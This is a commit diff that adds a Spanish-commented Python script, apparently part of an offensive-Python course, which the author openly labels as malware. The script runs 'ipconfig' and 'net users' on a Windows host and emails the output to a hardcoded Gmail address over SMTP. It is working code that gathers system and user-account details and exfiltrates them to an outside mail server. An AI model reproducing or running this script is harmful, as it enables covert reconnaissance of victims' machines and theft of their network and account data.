Add malware

python-ofensivo/15_hacking/10_malware/01_malware.py

@@ -0,0 +1,68 @@
+#!/usr/bin/env python3
+"""
+Malware - Envío del resultado de comandos por correo
+
+Algunas librerías necesitarán instalación si se ejecuta con python directamente.
+"""
+
+import dotenv
+import os
+import subprocess
+import smtplib
+from email.mime.text import MIMEText
+
+
+def run_command(command):
+    """
+    Ejecutor de comandos
+    """
+
+    output_command = subprocess.check_output(command, shell=True)
+
+    return output_command.decode('cp850')
+
+
+def send_email(subject, body, sender, recipients, password):
+    """
+    Envia un email con el reporte configurado
+    """
+
+    msg = MIMEText(body)
+    msg['Subject'] = subject
+    msg['From'] = sender
+    msg['To'] = ', '.join(recipients)
+
+    with smtplib.SMTP_SSL('smtp.gmail.com', 465) as smtp_server:
+
+        smtp_server.login(sender, password)
+        smtp_server.sendmail(sender, recipients, msg.as_string())
+
+    print(f"[i] Email sent Successfully!\n")
+
+
+if __name__ == '__main__':
+
+    dotenv.load_dotenv()
+    app_passwd = os.getenv("APP_PASSWD")
+
+    ipconfig_output = run_command("ipconfig")
+
+    # Primer correo
+    send_email(
+        "ipconfig INFO",
+        ipconfig_output,
+        "keyloggerseginf@gmail.com",
+        ["keyloggerseginf@gmail.com"],
+        app_passwd
+    )
+
+    users_info = run_command("net users")
+
+    # Segundo correo
+    send_email(
+        "users INFO",
+        users_info,
+        "keyloggerseginf@gmail.com",
+        ["keyloggerseginf@gmail.com"],
+        app_passwd
+    )